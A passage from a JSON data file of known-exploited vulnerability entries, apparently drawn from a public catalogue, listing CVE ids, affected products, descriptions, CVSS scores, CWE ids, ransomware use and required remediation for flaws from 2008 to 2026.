SSL VPN gateway.", "nvd_description": "Array Networks Array AG Series and vxAG (9.4.0.481 and earlier) allow remote code execution. An attacker can browse the filesystem on the SSL VPN gateway using a flags attribute in an HTTP header without authentication. The product could then be exploited through a vulnerable URL. The 2023-03-09 vendor advisory stated \"a new Array AG release with the fix will be available soon.\"", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-287", "CWE-306"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2022-41223", "name": "Mitel MiVoice Connect Code Injection Vulnerability", "vendor": "Mitel", "product": "MiVoice Connect", "kev_description": "The Director component in Mitel MiVoice Connect allows an authenticated attacker with internal network access to execute code within the context of the application.", "nvd_description": "The Director database component of MiVoice Connect through 19.3 (22.22.6100.0) could allow an authenticated attacker to conduct a code-injection attack via crafted data due to insufficient restrictions on the database data type.", "cvss": "6.8 MEDIUM CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-94"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2021-27876", "name": "Veritas Backup Exec Agent File Access Vulnerability", "vendor": "Veritas", "product": "Backup Exec Agent", "kev_description": "Veritas Backup Exec (BE) Agent contains a file access vulnerability that could allow an attacker to specially craft input parameters on a data management protocol command to access files on the BE Agent machine.", "nvd_description": "An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to gain unauthorized access and complete the authentication process. Subsequently, the client can execute data management protocol commands on the authenticated connection. By using crafted input parameters in one of these commands, an attacker can access an arbitrary file on the system using System privileges.", "cvss": "8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2020-0638", "name": "Microsoft Update Notification Manager Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Update Notification Manager", "kev_description": "Microsoft Update Notification Manager contains an unspecified vulnerability that allows for privilege escalation.", "nvd_description": "An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Update Notification Manager Elevation of Privilege Vulnerability'.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-59"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2019-7194", "name": "QNAP Photo Station Path Traversal Vulnerability", "vendor": "QNAP", "product": "Photo Station", "kev_description": "QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.", "nvd_description": "This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-22"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2018-19321", "name": "GIGABYTE Multiple Products Privilege Escalation Vulnerability", "vendor": "GIGABYTE", "product": "Multiple Products", "kev_description": "The GPCIDrv and GDrv low-level drivers in GIGABYTE App Center, AORUS Graphics Engine, XTREME Gaming Engine, and OC GURU II expose functionality to read and write arbitrary physical memory. This could be leveraged by a local attacker to elevate privileges.", "nvd_description": "The GPCIDrv and GDrv low-level drivers in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 expose functionality to read and write arbitrary physical memory. This could be leveraged by a local attacker to elevate privileges.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2017-11357", "name": "Telerik UI for ASP.NET AJAX Insecure Direct Object Reference Vulnerability", "vendor": "Telerik", "product": "User Interface (UI) for ASP.NET AJAX", "kev_description": "Telerik UI for ASP.NET AJAX contains an insecure direct object reference vulnerability in RadAsyncUpload that can result in file uploads in a limited location and/or remote code execution.", "nvd_description": "Progress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-434"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2016-3309", "name": "Microsoft Windows Kernel Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "A privilege escalation vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.", "nvd_description": "The kernel-mode drivers in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability,\" a different vulnerability than CVE-2016-3308, CVE-2016-3310, and CVE-2016-3311.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2015-1701", "name": "Microsoft Win32k Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Win32k", "kev_description": "An unspecified vulnerability exists in the Win32k.sys kernel-mode driver in Microsoft Windows Server that allows a local attacker to execute arbitrary code with elevated privileges.", "nvd_description": "Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2014-2120", "name": "Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability", "vendor": "Cisco", "product": "Adaptive Security Appliance (ASA)", "kev_description": "Cisco Adaptive Security Appliance (ASA) contains a cross-site scripting (XSS) vulnerability in the WebVPN login page. This vulnerability allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.", "nvd_description": "Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCun19025.", "cvss": "6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "cwes": ["CWE-79"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2013-0074", "name": "Microsoft Silverlight Double Dereference Vulnerability", "vendor": "Microsoft", "product": "Silverlight", "kev_description": "Microsoft Silverlight does not properly validate pointers during HTML object rendering, which allows remote attackers to execute code via a crafted Silverlight application.", "nvd_description": "Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 does not properly validate pointers during HTML object rendering, which allows remote attackers to execute arbitrary code via a crafted Silverlight application, aka \"Silverlight Double Dereference Vulnerability.\"", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2012-0507", "name": "Oracle Java SE Runtime Environment (JRE) Arbitrary Code Execution Vulnerability", "vendor": "Oracle", "product": "Java SE", "kev_description": "An incorrect type vulnerability exists in the Concurrency component of Oracle's Java Runtime Environment allows an attacker to remotely execute arbitrary code.", "nvd_description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Concurrency. NOTE: the previous information was obtained from the February 2012 Oracle CPU. Oracle has not commented on claims from a downstream vendor and third party researchers that this issue occurs because the AtomicReferenceArray class implementation does not ensure that the array is of the Object[] type, which allows attackers to cause a denial of service (JVM crash) or bypass Java sandbox restrictions. NOTE: this issue was originally mapped to CVE-2011-3571, but that identifier was already assigned to a different issue.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-843"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2011-2462", "name": "Adobe Reader and Acrobat Universal 3D Memory Corruption Vulnerability", "vendor": "Adobe", "product": "Reader and Acrobat", "kev_description": "The Universal 3D (U3D) component in Adobe Reader and Acrobat contains a memory corruption vulnerability which could allow remote attackers to execute code or cause denial-of-service (DoS).", "nvd_description": "Unspecified vulnerability in the U3D component in Adobe Reader and Acrobat 10.1.1 and earlier on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-787"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2010-0188", "name": "Adobe Reader and Acrobat Arbitrary Code Execution Vulnerability", "vendor": "Adobe", "product": "Reader and Acrobat", "kev_description": "Unspecified vulnerability in Adobe Reader and Acrobat allows attackers to cause a denial of service or possibly execute arbitrary code.", "nvd_description": "Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1 allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2009-0238", "name": "Microsoft Office Remote Code Execution", "vendor": "Microsoft", "product": "Office", "kev_description": "Microsoft Office Excel contains a remote code execution vulnerability that could allow an attacker to take complete control of an affected system if a user opens a specially crafted Excel file that includes a malformed object.", "nvd_description": "Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1; Excel Viewer 2003 Gold and SP3; Excel Viewer; Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1; and Excel in Microsoft Office 2004 and 2008 for Mac allow remote attackers to execute arbitrary code via a crafted Excel document that triggers an access attempt on an invalid object, as exploited in the wild in February 2009 by Trojan.Mdropper.AC.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-94"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2008-0655", "name": "Adobe Acrobat and Reader Unspecified Vulnerability", "vendor": "Adobe", "product": "Acrobat and Reader", "kev_description": "Adobe Acrobat and Reader contains an unespecified vulnerability described as a design flaw which could allow a specially crafted file to be printed silently an arbitrary number of times.", "nvd_description": "Multiple unspecified vulnerabilities in Adobe Reader and Acrobat before 8.1.2 have unknown impact and attack vectors.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-200"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2026-1731", "name": "BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) OS Command Injection Vulnerability", "vendor": "BeyondTrust", "product": "Remote Support (RS) and Privileged Remote Access (PRA)", "kev_description": "BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA)contain an OS command injection vulnerability. Successful exploitation could allow an unauthenticated remote attacker to execute operating system commands in the context of the site user. Successful exploitation requires no authentication or user interaction and may lead to system compromise, including unauthorized access, data exfiltration, and service disruption.", "nvd_description": "BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-78"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2025-10035", "name": "Fortra GoAnywhere MFT Deserialization of Untrusted Data Vulnerability", "vendor": "Fortra", "product": "GoAnywhere MFT", "kev_description": "Fortra GoAnywhere MFT contains a deserialization of untrusted data vulnerability allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection.", "nvd_description": "A deserialization vulnerability in the License Servlet of Fortra's GoAnywhere MFT allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection.", "cvss": "10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "cwes": ["CWE-502", "CWE-77"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2024-53704", "name": "SonicWall SonicOS SSLVPN Improper Authentication Vulnerability", "vendor": "SonicWall", "product": "SonicOS", "kev_description": "SonicWall SonicOS contains an improper authentication vulnerability in the SSLVPN authentication mechanism that allows a remote attacker to bypass authentication.", "nvd_description": "An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-287"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2023-43208", "name": "NextGen Healthcare Mirth Connect Deserialization of Untrusted Data Vulnerability", "vendor": "NextGen Healthcare", "product": "Mirth Connect", "kev_description": "NextGen Healthcare Mirth Connect contains a deserialization of untrusted data vulnerability that allows for unauthenticated remote code execution via a specially crafted request.", "nvd_description": "NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-502", "CWE-78"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2022-40765", "name": "Mitel MiVoice Connect Command Injection Vulnerability", "vendor": "Mitel", "product": "MiVoice Connect", "kev_description": "The Mitel Edge Gateway component of MiVoice Connect allows an authenticated attacker with internal network access to execute commands within the context of the system.", "nvd_description": "A vulnerability in the Edge Gateway component of Mitel MiVoice Connect through 19.3 (22.22.6100.0) could allow an authenticated attacker with internal network access to conduct a command-injection attack, due to insufficient restriction of URL parameters.", "cvss": "6.8 MEDIUM CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-77"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2021-27877", "name": "Veritas Backup Exec Agent Improper Authentication Vulnerability", "vendor": "Veritas", "product": "Backup Exec Agent", "kev_description": "Veritas Backup Exec (BE) Agent contains an improper authentication vulnerability that could allow an attacker unauthorized access to the BE Agent via SHA authentication scheme.", "nvd_description": "An issue was discovered in Veritas Backup Exec before 21.2. It supports multiple authentication schemes: SHA authentication is one of these. This authentication scheme is no longer used in current versions of the product, but hadn't yet been disabled. An attacker could remotely exploit this scheme to gain unauthorized access to an Agent and execute privileged commands.", "cvss": "8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2020-2021", "name": "Palo Alto Networks PAN-OS Authentication Bypass Vulnerability", "vendor": "Palo Alto Networks", "product": "PAN-OS", "kev_description": "Palo Alto Networks PAN-OS contains a vulnerability in SAML which allows an attacker to bypass authentication.", "nvd_description": "When Security Assertion Markup Language (SAML) authentication is enabled and the 'Validate Identity Provider Certificate' option is disabled (unchecked), improper verification of signatures in PAN-OS SAML authentication enables an unauthenticated network-based attacker to access protected resources. The attacker must have network access to the vulnerable server to exploit this vulnerability. This issue affects PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL). This issue does not affect PAN-OS 7.1. This issue cannot be exploited if SAML is not used for authentication. This issue cannot be exploited if the 'Validate Identity Provider Certificate' option is enabled (checked) in the SAML Identity Provider Server Profile. Resources that can be protected by SAML-based single sign-on (SSO) authentication are: GlobalProtect Gateway, GlobalProtect Portal, GlobalProtect Clientless VPN, Authentication and Captive Portal, PAN-OS next-generation firewalls (PA-Series, VM-Series) and Panorama web interfaces, Prisma Access In the case of GlobalProtect Gateways, GlobalProtect Portal, Clientless VPN, Captive Portal, and Prisma Access, an unauthenticated attacker with network access to the affected servers can gain access to protected resources if allowed by configured authentication and Security policies. There is no impact on the integrity and availability of the gateway, portal or VPN server. An attacker cannot inspect or tamper with sessions of regular users. In the worst case, this is a critical severity vulnerability with a CVSS Base Score of 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N). In the case of PAN-OS and Panorama web interfaces, this issue allows an unauthenticated attacker with network access to the PAN-OS or Panorama web interfaces to log in as an administrator and perform administrative actions. In the worst-case scenario, this is a critical severity vulnerability with a CVSS Base Score of 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). If the web interfaces are only accessible to a restricted management network, then the issue is lowered to a CVSS Base Score of 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). Palo Alto Networks is not aware of any malicious attempts to exploit this vulnerability.", "cvss": "10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "cwes": ["CWE-347"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2019-7193", "name": "QNAP QTS Improper Input Validation Vulnerability", "vendor": "QNAP", "product": "QTS", "kev_description": "QNAP QTS contains an improper input validation vulnerability allowing remote attackers to inject code on the system.", "nvd_description": "This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. To fix the vulnerability, QNAP recommend updating QTS to their latest versions.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-20"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2018-19320", "name": "GIGABYTE Multiple Products Unspecified Vulnerability", "vendor": "GIGABYTE", "product": "Multiple Products", "kev_description": "The GDrv low-level driver in GIGABYTE App Center, AORUS Graphics Engine, XTREME Gaming Engine, and OC GURU II exposes ring0 memcpy-like functionality that could allow a local attacker to take complete control of the affected system.", "nvd_description": "The GDrv low-level driver in GIGABYTE APP Center v1.05.21 and earlier, AORUS GRAPHICS ENGINE before 1.57, XTREME GAMING ENGINE before 1.26, and OC GURU II v2.08 exposes ring0 memcpy-like functionality that could allow a local attacker to take complete control of the affected system.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2017-0147", "name": "Microsoft Windows SMBv1 Information Disclosure Vulnerability", "vendor": "Microsoft", "product": "SMBv1 server", "kev_description": "The SMBv1 server in Microsoft Windows allows remote attackers to obtain sensitive information from process memory via a crafted packet.", "nvd_description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2016-1019", "name": "Adobe Flash Player Arbitrary Code Execution Vulnerability", "vendor": "Adobe", "product": "Flash Player", "kev_description": "Adobe Flash Player allows remote attackers to cause a denial of service or possibly execute arbitrary code.", "nvd_description": "Adobe Flash Player 21.0.0.197 and earlier allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2015-7755", "name": "Juniper ScreenOS Improper Authentication Vulnerability", "vendor": "Juniper", "product": "ScreenOS", "kev_description": "Juniper ScreenOS contains an improper authentication vulnerability that could allow unauthorized remote administrative access to the device.", "nvd_description": "Juniper ScreenOS 6.2.0r15 through 6.2.0r18, 6.3.0r12 before 6.3.0r12b, 6.3.0r13 before 6.3.0r13b, 6.3.0r14 before 6.3.0r14b, 6.3.0r15 before 6.3.0r15b, 6.3.0r16 before 6.3.0r16b, 6.3.0r17 before 6.3.0r17b, 6.3.0r18 before 6.3.0r18b, 6.3.0r19 before 6.3.0r19b, and 6.3.0r20 before 6.3.0r21 allows remote attackers to obtain administrative access by entering an unspecified password during a (1) SSH or (2) TELNET session.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-287"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2014-0502", "name": "Adobe Flash Player Double Free Vulnerablity", "vendor": "Adobe", "product": "Flash Player", "kev_description": "Adobe Flash Player contains a double free vulnerability that allows a remote attacker to execute arbitrary code.", "nvd_description": "Double free vulnerability in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in February 2014.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-415"], "ransomware_use": "Unknown", "required_action": "The impacted product is end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue utilization of the product."}, {"cve_id": "CVE-2013-2551", "name": "Microsoft Internet Explorer Use-After-Free Vulnerability", "vendor": "Microsoft", "product": "Internet Explorer", "kev_description": "Use-after-free vulnerability in Microsoft Internet Explorer allows remote attackers to execute remote code via a crafted web site that triggers access to a deleted object.", "nvd_description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka \"Internet Explorer Use After Free Vulnerability,\" a different vulnerability than CVE-2013-1308 and CVE-2013-1309.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-416"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2012-1854", "name": "Microsoft Visual Basic for Applications Insecure Library Loading Vulnerability", "vendor": "Microsoft", "product": "Visual Basic for Applications (VBA)", "kev_description": "Microsoft Visual Basic for Applications (VBA) contains an insecure library loading vulnerability that could allow for remote code execution.", "nvd_description": "Untrusted search path vulnerability in VBE6.dll in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Microsoft Visual Basic for Applications (VBA); and Summit Microsoft Visual Basic for Applications SDK allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .docx file, aka \"Visual Basic for Applications Insecure Library Loading Vulnerability,\" as exploited in the wild in July 2012.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-426"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2011-0609", "name": "Adobe Flash Player Unspecified Vulnerability", "vendor": "Adobe", "product": "Flash Player", "kev_description": "Adobe Flash Player contains an unspecified vulnerability that allows remote attackers to execute code or cause denial-of-service (DoS).", "nvd_description": "Unspecified vulnerability in Adobe Flash Player 10.2.154.13 and earlier on Windows, Mac OS X, Linux, and Solaris; 10.1.106.16 and earlier on Android; Adobe AIR 2.5.1 and earlier; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader and Acrobat 9.x through 9.4.2 and 10.x through 10.0.1 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content, as demonstrated by a .swf file embedded in an Excel spreadsheet, and as exploited in the wild in March 2011.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Unknown", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2010-0249", "name": "Microsoft Internet Explorer Use-After-Free Vulnerability", "vendor": "Microsoft", "product": "Internet Explorer", "kev_description": "Microsoft Internet Explorer contains an use-after-free vulnerability that could allow remote attackers to execute arbitrary code by accessing a pointer associated with a deleted object. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.", "nvd_description": "Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4; Windows XP SP2 and SP3; Windows Server 2003 SP2; Windows Vista Gold, SP1, and SP2; Windows Server 2008 Gold, SP2, and R2; and Windows 7 allows remote attackers to execute arbitrary code by accessing a pointer associated with a deleted object, related to incorrectly initialized memory and improper handling of objects in memory, as exploited in the wild in December 2009 and January 2010 during Operation Aurora, aka \"HTML Object Memory Corruption Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-416"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2009-0556", "name": "Microsoft Office PowerPoint Code Injection Vulnerability", "vendor": "Microsoft", "product": "Office", "kev_description": "Microsoft Office PowerPoint contains a code injection vulnerability that allows remote attackers to execute arbitrary code via a PowerPoint file with an OutlineTextRefAtom containing an invalid index value that triggers memory corruption.", "nvd_description": "Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a PowerPoint file with an OutlineTextRefAtom containing an an invalid index value that triggers memory corruption, as exploited in the wild in April 2009 by Exploit:Win32/Apptom.gen, aka \"Memory Corruption Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-94"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2008-3431", "name": "Oracle VirtualBox Insufficient Input Validation Vulnerability", "vendor": "Oracle", "product": "VirtualBox", "kev_description": "An input validation vulnerability exists in the VBoxDrv.sys driver of Sun xVM VirtualBox which allows attackers to locally execute arbitrary code.", "nvd_description": "The VBoxDrvNtDeviceControl function in VBoxDrv.sys in Sun xVM VirtualBox before 1.6.4 uses the METHOD_NEITHER communication method for IOCTLs and does not properly validate a buffer associated with the Irp object, which allows local users to gain privileges by opening the \\\\.\\VBoxDrv device and calling DeviceIoControl to send a crafted kernel address.", "cvss": "8.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2026-24423", "name": "SmarterTools SmarterMail Missing Authentication for Critical Function Vulnerability", "vendor": "SmarterTools", "product": "SmarterMail", "kev_description": "SmarterTools SmarterMail contains a missing authentication for critical function vulnerability in the ConnectToHub API method. This could allow the attacker to point the SmarterMail instance to a malicious HTTP server which 